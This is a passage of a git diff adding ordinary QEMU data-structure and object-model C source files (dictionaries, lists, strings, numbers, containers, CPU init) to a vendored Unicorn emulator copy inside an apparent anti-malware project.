+ */ +QDict *qdict_new(void) +{ + QDict *qdict; + + qdict = g_malloc0(sizeof(*qdict)); + QOBJECT_INIT(qdict, &qdict_type); + + return qdict; +} + +/** + * qobject_to_qdict(): Convert a QObject into a QDict + */ +QDict *qobject_to_qdict(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QDICT) + return NULL; + + return container_of(obj, QDict, base); +} + +/** + * tdb_hash(): based on the hash agorithm from gdbm, via tdb + * (from module-init-tools) + */ +static unsigned int tdb_hash(const char *name) +{ + unsigned value; /* Used to compute the hash value. */ + unsigned i; /* Used to cycle through random values. */ + + /* Set the initial value from the key size. */ + for (value = 0x238F13AF * strlen(name), i=0; name[i]; i++) + value = (value + (((const unsigned char *)name)[i] << (i*5 % 24))); + + return (1103515243 * value + 12345); +} + +/** + * alloc_entry(): allocate a new QDictEntry + */ +static QDictEntry *alloc_entry(const char *key, QObject *value) +{ + QDictEntry *entry; + + entry = g_malloc0(sizeof(*entry)); + entry->key = g_strdup(key); + entry->value = value; + + return entry; +} + +/** + * qdict_entry_value(): Return qdict entry value + * + * Return weak reference. + */ +QObject *qdict_entry_value(const QDictEntry *entry) +{ + return entry->value; +} + +/** + * qdict_entry_key(): Return qdict entry key + * + * Return a *pointer* to the string, it has to be duplicated before being + * stored. + */ +const char *qdict_entry_key(const QDictEntry *entry) +{ + return entry->key; +} + +/** + * qdict_find(): List lookup function + */ +static QDictEntry *qdict_find(const QDict *qdict, + const char *key, unsigned int bucket) +{ + QDictEntry *entry; + + QLIST_FOREACH(entry, &qdict->table[bucket], next) + if (!strcmp(entry->key, key)) + return entry; + + return NULL; +} + +/** + * qdict_put_obj(): Put a new QObject into the dictionary + * + * Insert the pair 'key:value' into 'qdict', if 'key' already exists + * its 'value' will be replaced. 
+ * + * This is done by freeing the reference to the stored QObject and + * storing the new one in the same entry. + * + * NOTE: ownership of 'value' is transferred to the QDict + */ +void qdict_put_obj(QDict *qdict, const char *key, QObject *value) +{ + unsigned int bucket; + QDictEntry *entry; + + bucket = tdb_hash(key) % QDICT_BUCKET_MAX; + entry = qdict_find(qdict, key, bucket); + if (entry) { + /* replace key's value */ + qobject_decref(entry->value); + entry->value = value; + } else { + /* allocate a new entry */ + entry = alloc_entry(key, value); + QLIST_INSERT_HEAD(&qdict->table[bucket], entry, next); + qdict->size++; + } +} + +/** + * qdict_get(): Lookup for a given 'key' + * + * Return a weak reference to the QObject associated with 'key' if + * 'key' is present in the dictionary, NULL otherwise. + */ +QObject *qdict_get(const QDict *qdict, const char *key) +{ + QDictEntry *entry; + + entry = qdict_find(qdict, key, tdb_hash(key) % QDICT_BUCKET_MAX); + return (entry == NULL ? NULL : entry->value); +} + +/** + * qdict_haskey(): Check if 'key' exists + * + * Return 1 if 'key' exists in the dict, 0 otherwise + */ +int qdict_haskey(const QDict *qdict, const char *key) +{ + unsigned int bucket = tdb_hash(key) % QDICT_BUCKET_MAX; + return (qdict_find(qdict, key, bucket) == NULL ? 0 : 1); +} + +/** + * qdict_size(): Return the size of the dictionary + */ +size_t qdict_size(const QDict *qdict) +{ + return qdict->size; +} + +/** + * qdict_get_obj(): Get a QObject of a specific type + */ +static QObject *qdict_get_obj(const QDict *qdict, const char *key, + qtype_code type) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + assert(obj != NULL); + assert(qobject_type(obj) == type); + + return obj; +} + +/** + * qdict_get_double(): Get an number mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QFloat or QInt object. + * + * Return number mapped by 'key'. 
+ */ +double qdict_get_double(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get(qdict, key); + + assert(obj); + switch (qobject_type(obj)) { + case QTYPE_QFLOAT: + return qfloat_get_double(qobject_to_qfloat(obj)); + case QTYPE_QINT: + return (double)qint_get_int(qobject_to_qint(obj)); + default: + abort(); + } +} + +/** + * qdict_get_int(): Get an integer mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QInt object. + * + * Return integer mapped by 'key'. + */ +int64_t qdict_get_int(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QINT); + return qint_get_int(qobject_to_qint(obj)); +} + +/** + * qdict_get_bool(): Get a bool mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QBool object. + * + * Return bool mapped by 'key'. + */ +int qdict_get_bool(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QBOOL); + return qbool_get_int(qobject_to_qbool(obj)); +} + +/** + * qdict_get_qlist(): Get the QList mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QList object. + * + * Return QList mapped by 'key'. + */ +QList *qdict_get_qlist(const QDict *qdict, const char *key) +{ + return qobject_to_qlist(qdict_get_obj(qdict, key, QTYPE_QLIST)); +} + +/** + * qdict_get_qdict(): Get the QDict mapped by 'key' + * + * This function assumes that 'key' exists and it stores a + * QDict object. + * + * Return QDict mapped by 'key'. + */ +QDict *qdict_get_qdict(const QDict *qdict, const char *key) +{ + return qobject_to_qdict(qdict_get_obj(qdict, key, QTYPE_QDICT)); +} + +/** + * qdict_get_str(): Get a pointer to the stored string mapped + * by 'key' + * + * This function assumes that 'key' exists and it stores a + * QString object. + * + * Return pointer to the string mapped by 'key'. 
+ */ +const char *qdict_get_str(const QDict *qdict, const char *key) +{ + QObject *obj = qdict_get_obj(qdict, key, QTYPE_QSTRING); + return qstring_get_str(qobject_to_qstring(obj)); +} + +/** + * qdict_get_try_int(): Try to get integer mapped by 'key' + * + * Return integer mapped by 'key', if it is not present in + * the dictionary or if the stored object is not of QInt type + * 'def_value' will be returned. + */ +int64_t qdict_get_try_int(const QDict *qdict, const char *key, + int64_t def_value) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QINT) + return def_value; + + return qint_get_int(qobject_to_qint(obj)); +} + +/** + * qdict_get_try_bool(): Try to get a bool mapped by 'key' + * + * Return bool mapped by 'key', if it is not present in the + * dictionary or if the stored object is not of QBool type + * 'def_value' will be returned. + */ +int qdict_get_try_bool(const QDict *qdict, const char *key, int def_value) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QBOOL) + return def_value; + + return qbool_get_int(qobject_to_qbool(obj)); +} + +/** + * qdict_get_try_str(): Try to get a pointer to the stored string + * mapped by 'key' + * + * Return a pointer to the string mapped by 'key', if it is not present + * in the dictionary or if the stored object is not of QString type + * NULL will be returned. + */ +const char *qdict_get_try_str(const QDict *qdict, const char *key) +{ + QObject *obj; + + obj = qdict_get(qdict, key); + if (!obj || qobject_type(obj) != QTYPE_QSTRING) + return NULL; + + return qstring_get_str(qobject_to_qstring(obj)); +} + +/** + * qdict_iter(): Iterate over all the dictionary's stored values. + * + * This function allows the user to provide an iterator, which will be + * called for each stored value in the dictionary. 
+ */ +void qdict_iter(const QDict *qdict, + void (*iter)(const char *key, QObject *obj, void *opaque), + void *opaque) +{ + int i; + QDictEntry *entry; + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QLIST_FOREACH(entry, &qdict->table[i], next) + iter(entry->key, entry->value, opaque); + } +} + +static QDictEntry *qdict_next_entry(const QDict *qdict, int first_bucket) +{ + int i; + + for (i = first_bucket; i < QDICT_BUCKET_MAX; i++) { + if (!QLIST_EMPTY(&qdict->table[i])) { + return QLIST_FIRST(&qdict->table[i]); + } + } + + return NULL; +} + +/** + * qdict_first(): Return first qdict entry for iteration. + */ +const QDictEntry *qdict_first(const QDict *qdict) +{ + return qdict_next_entry(qdict, 0); +} + +/** + * qdict_next(): Return next qdict entry in an iteration. + */ +const QDictEntry *qdict_next(const QDict *qdict, const QDictEntry *entry) +{ + QDictEntry *ret; + + ret = QLIST_NEXT(entry, next); + if (!ret) { + unsigned int bucket = tdb_hash(entry->key) % QDICT_BUCKET_MAX; + ret = qdict_next_entry(qdict, bucket + 1); + } + + return ret; +} + +/** + * qdict_clone_shallow(): Clones a given QDict. Its entries are not copied, but + * another reference is added. + */ +QDict *qdict_clone_shallow(const QDict *src) +{ + QDict *dest; + QDictEntry *entry; + int i; + + dest = qdict_new(); + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QLIST_FOREACH(entry, &src->table[i], next) { + qobject_incref(entry->value); + qdict_put_obj(dest, entry->key, entry->value); + } + } + + return dest; +} + +/** + * qentry_destroy(): Free all the memory allocated by a QDictEntry + */ +static void qentry_destroy(QDictEntry *e) +{ + assert(e != NULL); + assert(e->key != NULL); + assert(e->value != NULL); + + qobject_decref(e->value); + g_free(e->key); + g_free(e); +} + +/** + * qdict_del(): Delete a 'key:value' pair from the dictionary + * + * This will destroy all data allocated by this entry. 
+ */ +void qdict_del(QDict *qdict, const char *key) +{ + QDictEntry *entry; + + entry = qdict_find(qdict, key, tdb_hash(key) % QDICT_BUCKET_MAX); + if (entry) { + QLIST_REMOVE(entry, next); + qentry_destroy(entry); + qdict->size--; + } +} + +/** + * qdict_destroy_obj(): Free all the memory allocated by a QDict + */ +static void qdict_destroy_obj(QObject *obj) +{ + int i; + QDict *qdict; + + assert(obj != NULL); + qdict = qobject_to_qdict(obj); + + for (i = 0; i < QDICT_BUCKET_MAX; i++) { + QDictEntry *entry = QLIST_FIRST(&qdict->table[i]); + while (entry) { + QDictEntry *tmp = QLIST_NEXT(entry, next); + QLIST_REMOVE(entry, next); + qentry_destroy(entry); + entry = tmp; + } + } + + g_free(qdict); +} + +static void qdict_flatten_qdict(QDict *qdict, QDict *target, + const char *prefix); + +static void qdict_flatten_qlist(QList *qlist, QDict *target, const char *prefix) +{ + QObject *value; + const QListEntry *entry; + char *new_key; + int i; + + /* This function is never called with prefix == NULL, i.e., it is always + * called from within qdict_flatten_q(list|dict)(). Therefore, it does not + * need to remove list entries during the iteration (the whole list will be + * deleted eventually anyway from qdict_flatten_qdict()). */ + assert(prefix); + + entry = qlist_first(qlist); + + for (i = 0; entry; entry = qlist_next(entry), i++) { + value = qlist_entry_obj(entry); + new_key = g_strdup_printf("%s.%i", prefix, i); + + if (qobject_type(value) == QTYPE_QDICT) { + qdict_flatten_qdict(qobject_to_qdict(value), target, new_key); + } else if (qobject_type(value) == QTYPE_QLIST) { + qdict_flatten_qlist(qobject_to_qlist(value), target, new_key); + } else { + /* All other types are moved to the target unchanged. 
*/ + qobject_incref(value); + qdict_put_obj(target, new_key, value); + } + + g_free(new_key); + } +} + +static void qdict_flatten_qdict(QDict *qdict, QDict *target, const char *prefix) +{ + QObject *value; + const QDictEntry *entry, *next; + char *new_key; + bool delete; + + entry = qdict_first(qdict); + + while (entry != NULL) { + + next = qdict_next(qdict, entry); + value = qdict_entry_value(entry); + new_key = NULL; + delete = false; + + if (prefix) { + new_key = g_strdup_printf("%s.%s", prefix, entry->key); + } + + if (qobject_type(value) == QTYPE_QDICT) { + /* Entries of QDicts are processed recursively, the QDict object + * itself disappears. */ + qdict_flatten_qdict(qobject_to_qdict(value), target, + new_key ? new_key : entry->key); + delete = true; + } else if (qobject_type(value) == QTYPE_QLIST) { + qdict_flatten_qlist(qobject_to_qlist(value), target, + new_key ? new_key : entry->key); + delete = true; + } else if (prefix) { + /* All other objects are moved to the target unchanged. */ + qobject_incref(value); + qdict_put_obj(target, new_key, value); + delete = true; + } + + g_free(new_key); + + if (delete) { + qdict_del(qdict, entry->key); + + /* Restart loop after modifying the iterated QDict */ + entry = qdict_first(qdict); + continue; + } + + entry = next; + } +} + +/** + * qdict_flatten(): For each nested QDict with key x, all fields with key y + * are moved to this QDict and their key is renamed to "x.y". For each nested + * QList with key x, the field at index y is moved to this QDict with the key + * "x.y" (i.e., the reverse of what qdict_array_split() does). + * This operation is applied recursively for nested QDicts and QLists. 
+ */ +void qdict_flatten(QDict *qdict) +{ + qdict_flatten_qdict(qdict, qdict, NULL); +} + +/* extract all the src QDict entries starting by start into dst */ +void qdict_extract_subqdict(QDict *src, QDict **dst, const char *start) + +{ + const QDictEntry *entry, *next; + const char *p; + + *dst = qdict_new(); + entry = qdict_first(src); + + while (entry != NULL) { + next = qdict_next(src, entry); + if (strstart(entry->key, start, &p)) { + qobject_incref(entry->value); + qdict_put_obj(*dst, p, entry->value); + qdict_del(src, entry->key); + } + entry = next; + } +} + +static bool qdict_has_prefixed_entries(const QDict *src, const char *start) +{ + const QDictEntry *entry; + + for (entry = qdict_first(src); entry; entry = qdict_next(src, entry)) { + if (strstart(entry->key, start, NULL)) { + return true; + } + } + + return false; +} + +/** + * qdict_array_split(): This function moves array-like elements of a QDict into + * a new QList. Every entry in the original QDict with a key "%u" or one + * prefixed "%u.", where %u designates an unsigned integer starting at 0 and + * incrementally counting up, will be moved to a new QDict at index %u in the + * output QList with the key prefix removed, if that prefix is "%u.". If the + * whole key is just "%u", the whole QObject will be moved unchanged without + * creating a new QDict. The function terminates when there is no entry in the + * QDict with a prefix directly (incrementally) following the last one; it also + * returns if there are both entries with "%u" and "%u." for the same index %u. 
+ * Example: {"0.a": 42, "0.b": 23, "1.x": 0, "4.y": 1, "o.o": 7, "2": 66} + * (or {"1.x": 0, "4.y": 1, "0.a": 42, "o.o": 7, "0.b": 23, "2": 66}) + * => [{"a": 42, "b": 23}, {"x": 0}, 66] + * and {"4.y": 1, "o.o": 7} (remainder of the old QDict) + */ +void qdict_array_split(QDict *src, QList **dst) +{ + unsigned i; + + *dst = qlist_new(); + + for (i = 0; i < UINT_MAX; i++) { + QObject *subqobj; + bool is_subqdict; + QDict *subqdict; + char indexstr[32], prefix[32]; + size_t snprintf_ret; + + snprintf_ret = snprintf(indexstr, 32, "%u", i); + assert(snprintf_ret < 32); + + subqobj = qdict_get(src, indexstr); + + snprintf_ret = snprintf(prefix, 32, "%u.", i); + assert(snprintf_ret < 32); + + is_subqdict = qdict_has_prefixed_entries(src, prefix); + + // There may be either a single subordinate object (named "%u") or + // multiple objects (each with a key prefixed "%u."), but not both. + if (!subqobj == !is_subqdict) { + break; + } + + if (is_subqdict) { + qdict_extract_subqdict(src, &subqdict, prefix); + assert(qdict_size(subqdict) > 0); + } else { + qobject_incref(subqobj); + qdict_del(src, indexstr); + } + + qlist_append_obj(*dst, (subqobj!=NULL) ? subqobj : QOBJECT(subqdict)); + } +} + +/** + * qdict_join(): Absorb the src QDict into the dest QDict, that is, move all + * elements from src to dest. + * + * If an element from src has a key already present in dest, it will not be + * moved unless overwrite is true. + * + * If overwrite is true, the conflicting values in dest will be discarded and + * replaced by the corresponding values from src. + * + * Therefore, with overwrite being true, the src QDict will always be empty when + * this function returns. If overwrite is false, the src QDict will be empty + * iff there were no conflicts. 
+ */ +void qdict_join(QDict *dest, QDict *src, bool overwrite) +{ + const QDictEntry *entry, *next; + + entry = qdict_first(src); + while (entry) { + next = qdict_next(src, entry); + + if (overwrite || !qdict_haskey(dest, entry->key)) { + qobject_incref(entry->value); + qdict_put_obj(dest, entry->key, entry->value); + qdict_del(src, entry->key); + } + + entry = next; + } +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c new file mode 100644 index 0000000..5589854 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qerror.c @@ -0,0 +1,39 @@ +/* + * QError Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qjson.h" +#include "qapi/qmp/qerror.h" +#include "qemu-common.h" + + +/** + * qerror_human(): Format QError data into human-readable string. + */ +QString *qerror_human(const QError *qerror) +{ + return qstring_from_str(qerror->err_msg); +} + +void qerror_report(ErrorClass eclass, const char *fmt, ...) +{ +} + +/* Evil... */ +struct Error +{ + char *msg; + ErrorClass err_class; +}; + +void qerror_report_err(Error *err) +{ +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c new file mode 100644 index 0000000..d6d4d3a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qfloat.c @@ -0,0 +1,68 @@ +/* + * QFloat Module + * + * Copyright IBM, Corp. 2009 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. 
+ * + */ + +#include "qapi/qmp/qfloat.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qfloat_destroy_obj(QObject *obj); + +static const QType qfloat_type = { + QTYPE_QFLOAT, + qfloat_destroy_obj, +}; + +/** + * qfloat_from_int(): Create a new QFloat from a float + * + * Return strong reference. + */ +QFloat *qfloat_from_double(double value) +{ + QFloat *qf; + + qf = g_malloc(sizeof(*qf)); + qf->value = value; + QOBJECT_INIT(qf, &qfloat_type); + + return qf; +} + +/** + * qfloat_get_double(): Get the stored float + */ +double qfloat_get_double(const QFloat *qf) +{ + return qf->value; +} + +/** + * qobject_to_qfloat(): Convert a QObject into a QFloat + */ +QFloat *qobject_to_qfloat(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QFLOAT) + return NULL; + + return container_of(obj, QFloat, base); +} + +/** + * qfloat_destroy_obj(): Free all memory allocated by a + * QFloat object + */ +static void qfloat_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qfloat(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c new file mode 100644 index 0000000..e285d13 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qint.c @@ -0,0 +1,67 @@ +/* + * QInt Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qint.h" +#include "qapi/qmp/qobject.h" +#include "qemu-common.h" + +static void qint_destroy_obj(QObject *obj); + +static const QType qint_type = { + QTYPE_QINT, + qint_destroy_obj, +}; + +/** + * qint_from_int(): Create a new QInt from an int64_t + * + * Return strong reference. 
+ */ +QInt *qint_from_int(int64_t value) +{ + QInt *qi; + + qi = g_malloc(sizeof(*qi)); + qi->value = value; + QOBJECT_INIT(qi, &qint_type); + + return qi; +} + +/** + * qint_get_int(): Get the stored integer + */ +int64_t qint_get_int(const QInt *qi) +{ + return qi->value; +} + +/** + * qobject_to_qint(): Convert a QObject into a QInt + */ +QInt *qobject_to_qint(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QINT) + return NULL; + + return container_of(obj, QInt, base); +} + +/** + * qint_destroy_obj(): Free all memory allocated by a + * QInt object + */ +static void qint_destroy_obj(QObject *obj) +{ + assert(obj != NULL); + g_free(qobject_to_qint(obj)); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c new file mode 100644 index 0000000..60ce805 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qlist.c @@ -0,0 +1,170 @@ +/* + * QList Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qlist.h" +#include "qapi/qmp/qobject.h" +#include "qemu/queue.h" +#include "qemu-common.h" + +static void qlist_destroy_obj(QObject *obj); + +static const QType qlist_type = { + QTYPE_QLIST, + qlist_destroy_obj, +}; + +/** + * qlist_new(): Create a new QList + * + * Return strong reference. 
+ */ +QList *qlist_new(void) +{ + QList *qlist; + + qlist = g_malloc(sizeof(*qlist)); + QTAILQ_INIT(&qlist->head); + QOBJECT_INIT(qlist, &qlist_type); + + return qlist; +} + +static void qlist_copy_elem(QObject *obj, void *opaque) +{ + QList *dst = opaque; + + qobject_incref(obj); + qlist_append_obj(dst, obj); +} + +QList *qlist_copy(QList *src) +{ + QList *dst = qlist_new(); + + qlist_iter(src, qlist_copy_elem, dst); + + return dst; +} + +/** + * qlist_append_obj(): Append an QObject into QList + * + * NOTE: ownership of 'value' is transferred to the QList + */ +void qlist_append_obj(QList *qlist, QObject *value) +{ + QListEntry *entry; + + entry = g_malloc(sizeof(*entry)); + entry->value = value; + + QTAILQ_INSERT_TAIL(&qlist->head, entry, next); +} + +/** + * qlist_iter(): Iterate over all the list's stored values. + * + * This function allows the user to provide an iterator, which will be + * called for each stored value in the list. + */ +void qlist_iter(const QList *qlist, + void (*iter)(QObject *obj, void *opaque), void *opaque) +{ + QListEntry *entry; + + QTAILQ_FOREACH(entry, &qlist->head, next) + iter(entry->value, opaque); +} + +QObject *qlist_pop(QList *qlist) +{ + QListEntry *entry; + QObject *ret; + + if (qlist == NULL || QTAILQ_EMPTY(&qlist->head)) { + return NULL; + } + + entry = QTAILQ_FIRST(&qlist->head); + QTAILQ_REMOVE(&qlist->head, entry, next); + + ret = entry->value; + g_free(entry); + + return ret; +} + +QObject *qlist_peek(QList *qlist) +{ + QListEntry *entry; + QObject *ret; + + if (qlist == NULL || QTAILQ_EMPTY(&qlist->head)) { + return NULL; + } + + entry = QTAILQ_FIRST(&qlist->head); + + ret = entry->value; + + return ret; +} + +int qlist_empty(const QList *qlist) +{ + return QTAILQ_EMPTY(&qlist->head); +} + +static void qlist_size_iter(QObject *obj, void *opaque) +{ + size_t *count = opaque; + (*count)++; +} + +size_t qlist_size(const QList *qlist) +{ + size_t count = 0; + qlist_iter(qlist, qlist_size_iter, &count); + return count; +} 
+ +/** + * qobject_to_qlist(): Convert a QObject into a QList + */ +QList *qobject_to_qlist(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QLIST) { + return NULL; + } + + return container_of(obj, QList, base); +} + +/** + * qlist_destroy_obj(): Free all the memory allocated by a QList + */ +static void qlist_destroy_obj(QObject *obj) +{ + QList *qlist; + QListEntry *entry, *next_entry; + + assert(obj != NULL); + qlist = qobject_to_qlist(obj); + + QTAILQ_FOREACH_SAFE(entry, &qlist->head, next, next_entry) { + QTAILQ_REMOVE(&qlist->head, entry, next); + qobject_decref(entry->value); + g_free(entry); + } + + g_free(qlist); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c new file mode 100644 index 0000000..542810a --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qobject/qstring.c @@ -0,0 +1,149 @@ +/* + * QString Module + * + * Copyright (C) 2009 Red Hat Inc. + * + * Authors: + * Luiz Capitulino + * + * This work is licensed under the terms of the GNU LGPL, version 2.1 or later. + * See the COPYING.LIB file in the top-level directory. + */ + +#include "qapi/qmp/qobject.h" +#include "qapi/qmp/qstring.h" +#include "qemu-common.h" + +static void qstring_destroy_obj(QObject *obj); + +static const QType qstring_type = { + QTYPE_QSTRING, + qstring_destroy_obj, +}; + +/** + * qstring_new(): Create a new empty QString + * + * Return strong reference. 
+ */
+QString *qstring_new(void)
+{
+    return qstring_from_str("");
+}
+
+/**
+ * qstring_get_length(): Get the length of a QString
+ *
+ * Length is in bytes, excluding the NUL terminator.
+ */
+size_t qstring_get_length(const QString *qstring)
+{
+    return qstring->length;
+}
+
+/**
+ * qstring_from_substr(): Create a new QString from a C string substring
+ *
+ * 'end' is INCLUSIVE: the new string covers str[start..end], so its
+ * length is end - start + 1.  Passing end == start - 1 yields an empty
+ * QString (this is how qstring_from_str() handles "").
+ *
+ * Return string reference
+ */
+QString *qstring_from_substr(const char *str, int start, int end)
+{
+    QString *qstring;
+
+    qstring = g_malloc(sizeof(*qstring));
+
+    qstring->length = end - start + 1;
+    qstring->capacity = qstring->length;
+
+    /* +1 for the NUL terminator, which is kept at all times */
+    qstring->string = g_malloc(qstring->capacity + 1);
+    memcpy(qstring->string, str + start, qstring->length);
+    qstring->string[qstring->length] = 0;
+
+    QOBJECT_INIT(qstring, &qstring_type);
+
+    return qstring;
+}
+
+/**
+ * qstring_from_str(): Create a new QString from a regular C string
+ *
+ * Return strong reference.
+ */
+QString *qstring_from_str(const char *str)
+{
+    /* strlen(str) - 1 is the inclusive end index; see qstring_from_substr() */
+    return qstring_from_substr(str, 0, strlen(str) - 1);
+}
+
+/**
+ * capacity_increase(): Ensure room for 'len' more bytes (plus NUL),
+ * reallocating the buffer if needed.
+ */
+static void capacity_increase(QString *qstring, size_t len)
+{
+    if (qstring->capacity < (qstring->length + len)) {
+        qstring->capacity += len;
+        qstring->capacity *= 2; /* use exponential growth */
+
+        qstring->string = g_realloc(qstring->string, qstring->capacity + 1);
+    }
+}
+
+/* qstring_append(): Append a C string to a QString
+ */
+void qstring_append(QString *qstring, const char *str)
+{
+    size_t len = strlen(str);
+
+    capacity_increase(qstring, len);
+    memcpy(qstring->string + qstring->length, str, len);
+    qstring->length += len;
+    qstring->string[qstring->length] = 0;
+}
+
+/**
+ * qstring_append_int(): Append the decimal representation of a signed
+ * 64-bit integer to a QString.
+ */
+void qstring_append_int(QString *qstring, int64_t value)
+{
+    char num[32];
+
+    snprintf(num, sizeof(num), "%" PRId64, value);
+    qstring_append(qstring, num);
+}
+
+/**
+ * qstring_append_chr(): Append a C char to a QString
+ */
+void qstring_append_chr(QString *qstring, int c)
+{
+    capacity_increase(qstring, 1);
+    qstring->string[qstring->length++] = c;
+    qstring->string[qstring->length] = 0;
+}
+
+/**
+ * 
qobject_to_qstring(): Convert a QObject to a QString + */ +QString *qobject_to_qstring(const QObject *obj) +{ + if (qobject_type(obj) != QTYPE_QSTRING) + return NULL; + + return container_of(obj, QString, base); +} + +/** + * qstring_get_str(): Return a pointer to the stored string + * + * NOTE: Should be used with caution, if the object is deallocated + * this pointer becomes invalid. + */ +const char *qstring_get_str(const QString *qstring) +{ + return qstring->string; +} + +/** + * qstring_destroy_obj(): Free all memory allocated by a QString + * object + */ +static void qstring_destroy_obj(QObject *obj) +{ + QString *qs; + + assert(obj != NULL); + qs = qobject_to_qstring(obj); + g_free(qs->string); + g_free(qs); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs new file mode 100644 index 0000000..6a93ac7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/Makefile.objs @@ -0,0 +1,2 @@ +common-obj-y = object.o container.o qom-qobject.o +common-obj-y += cpu.o diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c new file mode 100644 index 0000000..e0e18f7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/container.c @@ -0,0 +1,50 @@ +/* + * Device Container + * + * Copyright IBM, Corp. 2012 + * + * Authors: + * Anthony Liguori + * + * This work is licensed under the terms of the GNU GPL, version 2 or later. + * See the COPYING file in the top-level directory. 
+ */ + +#include "qom/object.h" +#include "qemu/module.h" +#include + +static const TypeInfo container_info = { + "container", + TYPE_OBJECT, + 0, + sizeof(Object), +}; + +void container_register_types(struct uc_struct *uc) +{ + type_register_static(uc, &container_info); +} + +Object *container_get(struct uc_struct *uc, Object *root, const char *path) +{ + Object *obj, *child; + gchar **parts; + int i; + + parts = g_strsplit(path, "/", 0); + assert(parts != NULL && parts[0] != NULL && !parts[0][0]); + obj = root; + + for (i = 1; parts[i] != NULL; i++, obj = child) { + child = object_resolve_path_component(uc, obj, parts[i]); + if (!child) { + child = object_new(uc, "container"); + object_property_add_child(obj, parts[i], child, NULL); + } + } + + g_strfreev(parts); + + return obj; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c new file mode 100644 index 0000000..2c3a193 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/qom/cpu.c @@ -0,0 +1,284 @@ +/* + * QEMU CPU model + * + * Copyright (c) 2012-2014 SUSE LINUX Products GmbH + * + * This program is free software; you can redistribute it and/or + * modify it under the terms of the GNU General Public License + * as published by the Free Software Foundation; either version 2 + * of the License, or (at your option) any later version. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. 
+ * + * You should have received a copy of the GNU General Public License + * along with this program; if not, see + * + */ + +#include "qemu-common.h" +#include "qemu/log.h" +#include "uc_priv.h" + +bool cpu_exists(struct uc_struct* uc, int64_t id) +{ + CPUState *cpu = uc->cpu; + CPUClass *cc = CPU_GET_CLASS(uc, cpu); + + if (cc->get_arch_id(cpu) == id) { + return true; + } + return false; +} + +CPUState *cpu_generic_init(struct uc_struct *uc, const char *typename, const char *cpu_model) +{ + char *str, *name, *featurestr; + CPUState *cpu; + ObjectClass *oc; + CPUClass *cc; + Error *err = NULL; + + str = g_strdup(cpu_model); + name = strtok(str, ","); + + oc = cpu_class_by_name(uc, typename, name); + if (oc == NULL) { + g_free(str); + return NULL; + } + + cpu = CPU(object_new(uc, object_class_get_name(oc))); + cc = CPU_GET_CLASS(uc, cpu); + + featurestr = strtok(NULL, ","); + cc->parse_features(cpu, featurestr, &err); + g_free(str); + if (err != NULL) { + goto out; + } + + object_property_set_bool(uc, OBJECT(cpu), true, "realized", &err); + +out: + if (err != NULL) { + error_free(err); + object_unref(uc, OBJECT(cpu)); + return NULL; + } + + return cpu; +} + +bool cpu_paging_enabled(const CPUState *cpu) +{ + 